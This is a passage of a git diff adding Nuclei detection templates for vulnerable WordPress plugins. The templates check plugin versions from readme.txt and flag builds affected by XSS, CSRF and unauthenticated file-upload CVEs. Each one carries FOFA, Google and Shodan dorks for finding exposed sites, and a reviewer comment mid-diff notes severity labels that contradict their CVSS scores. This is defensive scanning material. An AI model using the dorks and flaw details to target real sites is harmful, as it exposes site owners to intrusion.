+ fofa-query: "wp-content/plugins/enhanced-tooltipglossary/"
+ google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "enhanced-tooltipglossary"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.3.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml b/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
new file mode 100644
index 0000000000..ea5f97b40d
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-business-directory/"
+ google-query: inurl:"/wp-content/plugins/cm-business-directory/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-business-directory,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-business-directory"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml b/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml
new file mode 100644
index 0000000000..4672417259
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-pop-up-banners/"
+ google-query: inurl:"/wp-content/plugins/cm-pop-up-banners/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-pop-up-banners,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-pop-up-banners/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-pop-up-banners"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml b/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml
new file mode 100644
index 0000000000..3e7b09a29a
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/"
+ google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-on-demand-search-and-replace"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml b/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
new file mode 100644
index 0000000000..0bd5c16918
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-header-footer-script-loader/"
+ google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-header-footer-script-loader"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml b/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
new file mode 100644
index 0000000000..59c5e3bdd8
--- /dev/null
+++ b/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512
+
+info:
+ name: >
+ Premium Packages – Sell Digital Products Securely <= 5.9.3 - Reflected Cross-Site Scripting via add_query_arg
+ author: topscoder
+ severity: medium
+ description: >
+ The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e847fd-0932-4d65-a201-b86e39a33588?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11225
+ metadata:
+ fofa-query: "wp-content/plugins/wpdm-premium-packages/"
+ google-query: inurl:"/wp-content/plugins/wpdm-premium-packages/"
+ shodan-query: 'vuln:CVE-2024-11225'
+ tags: cve,wordpress,wp-plugin,wpdm-premium-packages,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpdm-premium-packages/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpdm-premium-packages"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml b/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
new file mode 100644
index 0000000000..650c93ff82
--- /dev/null
+++ b/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da + +info: + name: > + Skt NURCaptcha <= 3.5.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Skt NURCaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.0. This is due to missing or incorrect nonce validation in the skt-nurc-admin.php file. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/96e47918-7848-407a-8f77-dbbfeb17029d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11342 + metadata: + fofa-query: "wp-content/plugins/skt-nurcaptcha/" + google-query: inurl:"/wp-content/plugins/skt-nurcaptcha/" + shodan-query: 'vuln:CVE-2024-11342' + tags: cve,wordpress,wp-plugin,skt-nurcaptcha,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-nurcaptcha/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-nurcaptcha" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml b/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml new file mode 100644 index 0000000000..f855a87c8d --- /dev/null 
+++ b/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc + +info: + name: > + WIP Incoming Lite <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WIP Incoming Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the save_option() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc949922-7bfa-4704-9038-cf4b5262f864?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11416 + metadata: + fofa-query: "wp-content/plugins/wip-incoming-lite/" + google-query: inurl:"/wp-content/plugins/wip-incoming-lite/" + shodan-query: 'vuln:CVE-2024-11416' + tags: cve,wordpress,wp-plugin,wip-incoming-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wip-incoming-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wip-incoming-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml b/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml new file mode 100644 index 0000000000..a531e42776 --- /dev/null +++ b/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3 + +info: + name: > + Additional Order Filters for WooCommerce <= 1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Additional Order Filters for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shipping_method_filter' parameter in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d59ea96f-ad02-4189-8155-7de7de5556ba?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11418 + metadata: + fofa-query: "wp-content/plugins/additional-order-filters-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/additional-order-filters-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-11418' + tags: cve,wordpress,wp-plugin,additional-order-filters-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/additional-order-filters-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "additional-order-filters-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.21') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml b/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml new file mode 100644 index 0000000000..9ee712546d --- /dev/null +++ b/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41 + +info: + name: > + Constant Contact Forms by MailMunch <= 2.0.11 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a84bd9c8-97bd-4572-8bfa-5191d98c9523?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-22137 + metadata: + fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/" + google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/" + shodan-query: 'vuln:CVE-2024-22137' + tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "constant-contact-forms-by-mailmunch" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.11') \ No newline at end of file 
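Review bot: `severity: low` contradicts `cvss-score: 6.4` a few lines below, which is Medium under the CVSS v3.1 bands the template itself cites, and the trailing `low` in `tags:` repeats the mismatch; consumers that filter or route on `severity` will under-rank this finding. The same disagreement appears in CVE-2024-47639 (low vs 6.4), CVE-2024-8236 (low vs 6.4), CVE-2024-8899 (low vs 4.3), CVE-2024-9170 (low vs 5.5), CVE-2024-9307 (low vs 9.9, an upload-to-RCE path) and CVE-2024-9461 (low vs 7.2, authenticated RCE), so the generator appears to be emitting `low` independently of the score. For this file the fix is `severity: medium` and `tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,medium`; the others need their severity derived from their own score.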
diff --git a/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml b/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml new file mode 100644 index 0000000000..22140dbc38 --- /dev/null +++ b/poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e + +info: + name: > + Contact Form 7 Summary and Print <= 1.2.5 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Contact Form 7 Summary and Print plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the cf7sp_save_settings() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f00b763-1b8a-4a20-96c6-7a93adf806e4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-38724 + metadata: + fofa-query: "wp-content/plugins/cf7-summary-and-print/" + google-query: inurl:"/wp-content/plugins/cf7-summary-and-print/" + shodan-query: 'vuln:CVE-2024-38724' + tags: cve,wordpress,wp-plugin,cf7-summary-and-print,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-summary-and-print/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-summary-and-print" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml b/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml new file mode 100644 index 0000000000..bf655cc2d5 --- /dev/null +++ b/poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-47638-e7353821f2fc91f455eddee79fe76776 + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8f7d1c3-50eb-44ef-a832-a0230ff1406f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-47638 + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:CVE-2024-47638' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml b/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml new file mode 100644 index 0000000000..ee9b2848a9 --- /dev/null +++ b/poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f + +info: + name: > + VdoCipher <= 1.29 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The VdoCipher plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae7fa018-c87f-463b-84a3-bbe71b73d3dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-47639 + metadata: + fofa-query: "wp-content/plugins/vdocipher/" + google-query: inurl:"/wp-content/plugins/vdocipher/" + shodan-query: 'vuln:CVE-2024-47639' + tags: cve,wordpress,wp-plugin,vdocipher,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vdocipher/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vdocipher" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.29') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml b/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml new file mode 100644 index 0000000000..1e473538dc --- /dev/null +++ b/poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-52377-892589d65d97802ea2d1e85ee0198106 + +info: + name: > + Instant Image Generator <= 1.5.2 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Instant Image Generator (One Click Image Uploads from Pixabay, Pexels and OpenAI) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in a function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8276ecfe-962b-4813-8011-4c8ca59d5389?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-52377 + metadata: + fofa-query: "wp-content/plugins/ai-image/" + google-query: inurl:"/wp-content/plugins/ai-image/" + shodan-query: 'vuln:CVE-2024-52377' + tags: cve,wordpress,wp-plugin,ai-image,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ai-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ai-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml b/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml new file mode 100644 index 0000000000..687cf5bbd6 --- /dev/null +++ b/poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.25.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8236 + metadata: + fofa-query: 